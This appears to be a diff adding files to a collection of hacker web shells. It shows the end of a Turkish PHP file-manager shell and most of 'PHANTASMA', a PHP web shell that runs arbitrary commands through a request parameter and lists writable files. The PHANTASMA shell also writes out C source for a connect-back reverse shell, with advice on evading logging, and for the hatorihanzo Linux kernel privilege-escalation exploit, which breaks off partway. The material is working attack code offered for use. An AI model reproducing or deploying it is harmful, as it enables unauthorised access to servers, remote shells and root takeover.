<td width="625" bgcolor="#000000"><span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td bgcolor="#000000" height="20">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
|
||||
height="19" bordercolor="#000000">
|
||||
<span style="font-weight: 700">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
|
||||
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
|
||||
<tr>
|
||||
<td width="30" height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Tür</font></td>
|
||||
<td height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Dosya
|
||||
Adý</font></td>
|
||||
<td width="122" height="17" bgcolor="#9F9F9F">
|
||||
<p align="center">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Ýþlem</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<?
|
||||
if ($sedat=@opendir($dizin)){
|
||||
while (($ekinci=readdir ($sedat))){
|
||||
if (is_dir("$dizin/$ekinci")){
|
||||
?>
|
||||
|
||||
<? if ($ekinci=="." or $ekinci=="..") {
|
||||
} else {
|
||||
?>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
|
||||
<tr>
|
||||
<td width="30" height="17" bgcolor="#808080">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
|
||||
<td height="17" bgcolor="#C4C4C4">
|
||||
<font face="Verdana" style="font-size: 8pt"> <?echo "$ekinci" ?></font></td>
|
||||
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
|
||||
<font color="#000000">Aç</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
|
||||
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a>
|
||||
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<?
|
||||
}
|
||||
?>
|
||||
|
||||
<?
|
||||
}}}
|
||||
closedir($sedat);
|
||||
?>
|
||||
|
||||
<?
|
||||
if ($sedat=@opendir($dizin)){
|
||||
while (($ekinci=readdir ($sedat))){
|
||||
if (is_file("$dizin/$ekinci")){
|
||||
|
||||
?>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
|
||||
<tr>
|
||||
<td width="30" height="1" bgcolor="#B0B0B0">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
|
||||
<td height="1" bgcolor="#EAEAEA">
|
||||
<font face="Verdana" style="font-size: 8pt"> <?echo "$ekinci" ?></font>
|
||||
<font face="Arial Narrow" style="font-size: 8pt"> ( XXX ) </font></td>
|
||||
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6"
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
|
||||
<font color="#000000">Düzenle</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<?
|
||||
}}}
|
||||
closedir($sedat);
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000">
|
||||
</body></html><? } ?><? } ?><? } ?><? } ?>
|
634
xakep-shells/PHP/PHANTASMA.php.txt
Normal file
634
xakep-shells/PHP/PHANTASMA.php.txt
Normal file
|
@ -0,0 +1,634 @@
|
|||
<CENTER>
|
||||
<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
|
||||
<BR>
|
||||
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informação do sistema</DIV>
|
||||
<?php
|
||||
|
||||
//
|
||||
closelog( );
|
||||
|
||||
$dono = get_current_user( );
|
||||
$ver = phpversion( );
|
||||
$login = posix_getuid( );
|
||||
$euid = posix_geteuid( );
|
||||
$gid = posix_getgid( );
|
||||
if ($chdir == "") $chdir = getcwd( );
|
||||
|
||||
?>
|
||||
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
|
||||
<?php
|
||||
|
||||
$uname = posix_uname( );
|
||||
while (list($info, $value) = each ($uname)) {
|
||||
|
||||
?>
|
||||
<TR>
|
||||
<TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
|
||||
</TR>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
|
||||
<TR>
|
||||
<TR>
|
||||
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
|
||||
</TR>
|
||||
<TR>
|
||||
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
|
||||
</TR>
|
||||
<TR>
|
||||
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
|
||||
</TR>
|
||||
<TR>
|
||||
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
|
||||
</TR>
|
||||
<TR>
|
||||
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa = gethostbyname($SERVER_NAME); echo $aaa;?></DIV></TD>
|
||||
</TR>
|
||||
<TR>
|
||||
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
|
||||
</TR>
|
||||
</TABLE>
|
||||
<BR>
|
||||
<?php
|
||||
|
||||
if ($cmd != "") {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
|
||||
|
||||
?>
|
||||
|
||||
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
|
||||
<?php
|
||||
|
||||
if ($fe == 1){
|
||||
$fe = "exec";
|
||||
}
|
||||
if ($fe == ""){
|
||||
$fe = "passthru";
|
||||
}
|
||||
if ($fe == "2"){
|
||||
$fe = "system";
|
||||
}
|
||||
|
||||
if (isset($chdir)) @chdir($chdir);
|
||||
|
||||
ob_start( );
|
||||
$fe("$cmd 2>&1");
|
||||
$output = ob_get_contents();
|
||||
ob_end_clean( );
|
||||
|
||||
?>
|
||||
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
|
||||
<?php
|
||||
|
||||
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
|
||||
?>
|
||||
</TEXTAREA>
|
||||
<BR>
|
||||
<?php
|
||||
|
||||
}
|
||||
|
||||
if ($safemode != "") {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
|
||||
|
||||
?>
|
||||
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
|
||||
<?php
|
||||
|
||||
if ($dir = @opendir($chdir)) {
|
||||
echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
|
||||
echo "<TR>";
|
||||
echo "<TD valign=top>";
|
||||
echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
|
||||
while (($file = readdir($dir)) !== false) {
|
||||
if (@is_file($file)) {
|
||||
$file1 = fileowner($file);
|
||||
$file2 = fileperms($file);
|
||||
echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>";
|
||||
// echo "<font color=green>$file1 - $file2 - $file </font><br>";
|
||||
flush( );
|
||||
}
|
||||
}
|
||||
|
||||
echo "</TD>";
|
||||
echo"<TD valign=top>";
|
||||
echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
|
||||
if ($dir = @opendir($chdir)) {
|
||||
while (($file = readdir($dir)) !== false) {
|
||||
if (@is_dir($file)) {
|
||||
$file1 = fileowner($file);
|
||||
$file2 = fileperms($file);
|
||||
echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>";
|
||||
// echo "<font color=blue>$file1 - $file2 - $file </font><br>";
|
||||
}
|
||||
}
|
||||
}
|
||||
echo "</TD>";
|
||||
echo"<TD valign=top>";
|
||||
echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
|
||||
if ($dir = @opendir($chdir)) {
|
||||
while (($file = readdir($dir)) !== false) {
|
||||
if (@is_writable($file) && @is_dir($file)) {
|
||||
$file1 = fileowner($file);
|
||||
$file2 = fileperms($file);
|
||||
echo "<font color=red>$file1 - $file2 - $file </font><br>";
|
||||
}
|
||||
}
|
||||
}
|
||||
echo "</TD>";
|
||||
echo "</TD>";
|
||||
echo "<TD valign=top>";
|
||||
echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
|
||||
|
||||
if ($dir = opendir($chdir)) {
|
||||
while (($file = readdir($dir)) !== false) {
|
||||
if (@is_writable($file) && @is_file($file)) {
|
||||
$file1 = fileowner($file);
|
||||
$file2 = fileperms($file);
|
||||
echo "<font color=red>$file1 - $file2 - $file </font><br>";
|
||||
}
|
||||
}
|
||||
}
|
||||
echo "</TD>";
|
||||
echo "</TR>";
|
||||
echo "</TABLE>";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
<?php
|
||||
|
||||
if ($shell == "write") {
|
||||
$shell = "#include <stdio.h>\n" .
|
||||
"#include <sys/socket.h>\n" .
|
||||
"#include <netinet/in.h>\n" .
|
||||
"#include <arpa/inet.h>\n" .
|
||||
"#include <netdb.h>\n" .
|
||||
"int main(int argc, char **argv) {\n" .
|
||||
" char *host;\n" .
|
||||
" int port = 80;\n" .
|
||||
" int f;\n" .
|
||||
" int l;\n" .
|
||||
" int sock;\n" .
|
||||
" struct in_addr ia;\n" .
|
||||
" struct sockaddr_in sin, from;\n" .
|
||||
" struct hostent *he;\n" .
|
||||
" char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
|
||||
" \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
|
||||
" \"For More Reliable Shell.\\n\"\n" .
|
||||
" \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
|
||||
" \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
|
||||
" printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
|
||||
" if (argc < 2 || argc > 3) {\n" .
|
||||
" printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
|
||||
" return 1;\n" .
|
||||
" }\n" .
|
||||
" printf(\"[*] Dumping Arguments\\n\");\n" .
|
||||
" l = strlen(argv[1]);\n" .
|
||||
" if (l <= 0) {\n" .
|
||||
" printf(\"[-] Invalid Host Name\\n\");\n" .
|
||||
" return 1;\n" .
|
||||
" }\n" .
|
||||
" if (!(host = (char *) malloc(l))) {\n" .
|
||||
" printf(\"[-] Unable to Allocate Memory\\n\");\n" .
|
||||
" return 1;\n" .
|
||||
" }\n" .
|
||||
" strncpy(host, argv[1], l);\n" .
|
||||
" if (argc == 3) {\n" .
|
||||
" port = atoi(argv[2]);\n" .
|
||||
" if (port <= 0 || port > 65535) {\n" .
|
||||
" printf(\"[-] Invalid Port Number\\n\");\n" .
|
||||
" return 1;\n" .
|
||||
" }\n" .
|
||||
" }\n" .
|
||||
" printf(\"[*] Resolving Host Name\\n\");\n" .
|
||||
" he = gethostbyname(host);\n" .
|
||||
" if (he) {\n" .
|
||||
" memcpy(&ia.s_addr, he->h_addr, 4);\n" .
|
||||
" } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
|
||||
" printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
|
||||
" return 1;\n" .
|
||||
" }\n" .
|
||||
" sin.sin_family = PF_INET;\n" .
|
||||
" sin.sin_addr.s_addr = ia.s_addr;\n" .
|
||||
" sin.sin_port = htons(port);\n" .
|
||||
" printf(\"[*] Connecting...\\n\");\n" .
|
||||
" if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
|
||||
" printf(\"[-] Socket Error\\n\");\n" .
|
||||
" return 1;\n" .
|
||||
" }\n" .
|
||||
" if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
|
||||
" printf(\"[-] Unable to Connect\\n\");\n" .
|
||||
" return 1;\n" .
|
||||
" }\n" .
|
||||
" printf(\"[*] Spawning Shell\\n\");\n" .
|
||||
" f = fork( );\n" .
|
||||
" if (f < 0) {\n" .
|
||||
" printf(\"[-] Unable to Fork\\n\");\n" .
|
||||
" return 1;\n" .
|
||||
" } else if (!f) {\n" .
|
||||
" write(sock, msg, sizeof(msg));\n" .
|
||||
" dup2(sock, 0);\n" .
|
||||
" dup2(sock, 1);\n" .
|
||||
" dup2(sock, 2);\n" .
|
||||
" execl(\"/bin/sh\", \"shell\", NULL);\n" .
|
||||
" close(sock);\n" .
|
||||
" return 0;\n" .
|
||||
" }\n" .
|
||||
" printf(\"[*] Detached\\n\\n\");\n" .
|
||||
" return 0;\n" .
|
||||
"}\n";
|
||||
|
||||
$fp = fopen("/tmp/dc-connectback.c", "w");
|
||||
$ok = fwrite($fp, $shell);
|
||||
|
||||
if (!empty($ok)) {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
|
||||
} else {
|
||||
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
|
||||
}
|
||||
}
|
||||
|
||||
if ($kernel == "write") {
|
||||
$kernel = "/*\n" .
|
||||
" * hatorihanzo.c\n" .
|
||||
" * Linux kernel do_brk vma overflow exploit.\n" .
|
||||
" *\n" .
|
||||
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
|
||||
" *\n" .
|
||||
" * Further research and exploit development by\n" .
|
||||
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
|
||||
" *\n" .
|
||||
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
|
||||
" *\n" .
|
||||
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
|
||||
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
|
||||
"*/\n" .
|
||||
"#define _GNU_SOURCE\n" .
|
||||
"#include <stdio.h>\n" .
|
||||
"#include <stdlib.h>\n" .
|
||||
"#include <errno.h>\n" .
|
||||
"#include <string.h>\n" .
|
||||
"#include <unistd.h>\n" .
|
||||
"#include <fcntl.h>\n" .
|
||||
"#include <signal.h>\n" .
|
||||
"#include <paths.h>\n" .
|
||||
"#include <grp.h>\n" .
|
||||
"#include <setjmp.h>\n" .
|
||||
"#include <stdint.h>\n" .
|
||||
"#include <sys/mman.h>\n" .
|
||||
"#include <sys/ipc.h>\n" .
|
||||
"#include <sys/shm.h>\n" .
|
||||
"#include <sys/ucontext.h>\n" .
|
||||
"#include <sys/wait.h>\n" .
|
||||
"#include <asm/ldt.h>\n" .
|
||||
"#include <asm/page.h>\n" .
|
||||
"#include <asm/segment.h>\n" .
|
||||
"#include <linux/unistd.h>\n" .
|
||||
"#include <linux/linkage.h>\n" .
|
||||
"#define kB * 1024\n" .
|
||||
"#define MB * 1024 kB\n" .
|
||||
"#define GB * 1024 MB\n" .
|
||||
"#define MAGIC 0xdefaced /* I should've patented this number -cliph */\n" .
|
||||
"#define ENTRY_MAGIC 0\n" .
|
||||
"#define ENTRY_GATE 2\n" .
|
||||
"#define ENTRY_CS 4\n" .
|
||||
"#define ENTRY_DS 6\n" .
|
||||
"#define CS ((ENTRY_CS << 2) | 4)\n" .
|
||||
"#define DS ((ENTRY_DS << 2) | 4)\n" .
|
||||
"#define GATE ((ENTRY_GATE << 2) | 4 | 3)\n" .
|
||||
"#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
|
||||
"#define TOP_ADDR 0xFFFFE000U\n" .
|
||||
"/* configuration */\n" .
|
||||
"unsigned task_size;\n" .
|
||||
"unsigned page;\n" .
|
||||
"uid_t uid;\n" .
|
||||
"unsigned address;\n" .
|
||||
"int dontexit = 0;\n" .
|
||||
"void fatal(char * msg)\n" .
|
||||
"{\n" .
|
||||
" fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
|
||||
" if (dontexit) {\n" .
|
||||
" fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
|
||||
" kill(getpid(), SIGSTOP);\n" .
|
||||
" for (;;) pause();\n" .
|
||||
" }\n" .
|
||||
" exit(EXIT_FAILURE);\n" .
|
||||
"}\n" .
|
||||
"void configure(void)\n" .
|
||||
"{\n" .
|
||||
" unsigned val;\n" .
|
||||
" task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
|
||||
" uid = getuid();\n" .
|
||||
"}\n" .
|
||||
"void expand(void)\n" .
|
||||
"{\n" .
|
||||
" unsigned top = (unsigned) sbrk(0);\n" .
|
||||
" unsigned limit = address + PAGE_SIZE;\n" .
|
||||
" do {\n" .
|
||||
" if (sbrk(PAGE_SIZE) == NULL)\n" .
|
||||
" fatal(\"Kernel seems not to be vulnerable\");\n" .
|
||||
" dontexit = 1;\n" .
|
||||
" top += PAGE_SIZE;\n" .
|
||||
" } while (top < limit);\n" .
|
||||
"}\n" .
|
||||
"jmp_buf jmp;\n" .
|
||||
"#define MAP_NOPAGE 1\n" .
|
||||
"#define MAP_ISPAGE 2\n" .
|
||||
"void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
|
||||
"{\n" .
|
||||
" struct ucontext * uc = (struct ucontext *) ptr;\n" .
|
||||
" int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
|
||||
" (void)signo;\n" .
|
||||
" (void)si;\n" .
|
||||
" error_code = MAP_NOPAGE + (error_code & 1);\n" .
|
||||
" longjmp(jmp, error_code);\n" .
|
||||
"}\n" .
|
||||
"void prepare(void)\n" .
|
||||
"{\n" .
|
||||
" struct sigaction sa;\n" .
|
||||
" sa.sa_sigaction = sigsegv;\n" .
|
||||
" sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
|
||||
" sigemptyset(&sa.sa_mask);\n" .
|
||||
" sigaction(SIGSEGV, &sa, NULL);\n" .
|
||||
"}\n" .
|
||||
"int testaddr(unsigned addr)\n" .
|
||||
"{\n" .
|
||||
" int val;\n" .
|
||||
" val = setjmp(jmp);\n" .
|
||||
" if (val == 0) {\n" .
|
||||
" asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
|
||||
" return MAP_ISPAGE;\n" .
|
||||
" }\n" .
|
||||
" return val;\n" .
|
||||
"}\n" .
|
||||
"#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
|
||||
"#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
|
||||
"#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
|
||||
"void map(unsigned * map)\n" .
|
||||
"{\n" .
|
||||
" unsigned addr = task_size;\n" .
|
||||
" unsigned bit = 1;\n" .
|
||||
" prepare();\n" .
|
||||
" while (addr < TOP_ADDR) {\n" .
|
||||
" if (testaddr(addr) == MAP_ISPAGE)\n" .
|
||||
" *map |= bit;\n" .
|
||||
" addr += PAGE_SIZE;\n" .
|
||||
" next(map, bit);\n" .
|
||||
" }\n" .
|
||||
" signal(SIGSEGV, SIG_DFL);\n" .
|
||||
"}\n" .
|
||||
"void find(unsigned * m)\n" .
|
||||
"{\n" .
|
||||
" unsigned addr = task_size;\n" .
|
||||
" unsigned bit = 1;\n" .
|
||||
" unsigned count;\n" .
|
||||
" unsigned tmp;\n" .
|
||||
" prepare();\n" .
|
||||
" tmp = address = count = 0U;\n" .
|
||||
" while (addr < TOP_ADDR) {\n" .
|
||||
" int val = testaddr(addr);\n" .
|
||||
" if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
|
||||
" if (!tmp) tmp = addr;\n" .
|
||||
" count++;\n" .
|
||||
" } else {\n" .
|
||||
" if (tmp && count == LDT_PAGES) {\n" .
|
||||
" errno = EAGAIN;\n" .
|
||||
" if (address)\n" .
|
||||
" fatal(\"double allocation\\n\");\n" .
|
||||
" address = tmp;\n" .
|
||||
" }\n" .
|
||||
" tmp = count = 0U;\n" .
|
||||
" }\n" .
|
||||
" addr += PAGE_SIZE;\n" .
|
||||
" next(m, bit);\n" .
|
||||
" }\n" .
|
||||
" signal(SIGSEGV, SIG_DFL);\n" .
|
||||
" if (address)\n" .
|
||||
" return;\n" .
|
||||
" errno = ENOTSUP;\n" .
|
||||
" fatal(\"Unable to determine kernel address\");\n" .
|
||||
"}\n" .
|
||||
"int modify_ldt(int, void *, unsigned);\n" .
|
||||
"void ldt(unsigned * m)\n" .
|
||||
"{\n" .
|
||||
" struct modify_ldt_ldt_s l;\n" .
|
||||
" map(m);\n" .
|
||||
" memset(&l, 0, sizeof(l));\n" .
|
||||
" l.entry_number = LDT_ENTRIES - 1;\n" .
|
||||
" l.seg_32bit = 1;\n" .
|
||||
" l.base_addr = MAGIC >> 16;\n" .
|
||||
" l.limit = MAGIC & 0xffff;\n" .
|
||||
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
|
||||
" fatal(\"Unable to set up LDT\");\n" .
|
||||
" l.entry_number = ENTRY_MAGIC / 2;\n" .
|
||||
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
|
||||
" fatal(\"Unable to set up LDT\");\n" .
|
||||
" find(m);\n" .
|
||||
"}\n" .
|
||||
"asmlinkage void kernel(unsigned * task)\n" .
|
||||
"{\n" .
|
||||
" unsigned * addr = task;\n" .
|
||||
" /* looking for uids */\n" .
|
||||
" while (addr[0] != uid || addr[1] != uid ||\n" .
|
||||
" addr[2] != uid || addr[3] != uid)\n" .
|
||||
" addr++;\n" .
|
||||
" addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */\n" .
|
||||
" addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */\n" .
|
||||
" addr[8] = 0;\n" .
|
||||
" /* looking for vma */\n" .
|
||||
" for (addr = (unsigned *) task_size; addr; addr++) {\n" .
|
||||
" if (addr[0] >= task_size && addr[1] < task_size &&\n" .
|
||||
" addr[2] == address && addr[3] >= task_size) {\n" .
|
||||
" addr[2] = task_size - PAGE_SIZE;\n" .
|
||||
" addr = (unsigned *) addr[3];\n" .
|
||||
" addr[1] = task_size - PAGE_SIZE;\n" .
|
||||
" addr[2] = task_size;\n" .
|
||||
" break;\n" .
|
||||
" }\n" .
|
||||
" }\n" .
|
||||
"}\n" .
|
||||
"void kcode(void);\n" .
|
||||
"#define __str(s) #s\n" .
|
||||
"#define str(s) __str(s)\n" .
|
||||
"void __kcode(void)\n" .
|
||||
"{\n" .
|
||||
" asm(\n" .
|
||||
" \"kcode: \\n\"\n" .
|
||||
" \" pusha \\n\"\n" .
|
||||
" \" pushl %es \\n\"\n" .
|
||||
" \" pushl %ds \\n\"\n" .
|
||||
" \" movl $(\" str(DS) \") ,%edx \\n\"\n" .
|
||||
" \" movl %edx,%es \\n\"\n" .
|
||||
" \" movl %edx,%ds \\n\"\n" .
|
||||
" \" movl $0xffffe000,%eax \\n\"\n" .
|
||||
" \" andl %esp,%eax \\n\"\n" .
|
||||
" \" pushl %eax \\n\"\n" .
|
||||
" \" call kernel \\n\"\n" .
|
||||
" \" addl $4, %esp \\n\"\n" .
|
||||
" \" popl %ds \\n\"\n" .
|
||||
" \" popl %es \\n\"\n" .
|
||||
" \" popa \\n\"\n" .
|
||||
" \" lret \\n\"\n" .
|
||||
" );\n" .
|
||||
"}\n" .
|
||||
"void knockout(void)\n" .
|
||||
"{\n" .
|
||||
" unsigned * addr = (unsigned *) address;\n" .
|
||||
" if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
|
||||
" fatal(\"Unable to change page protection\");\n" .
|
||||
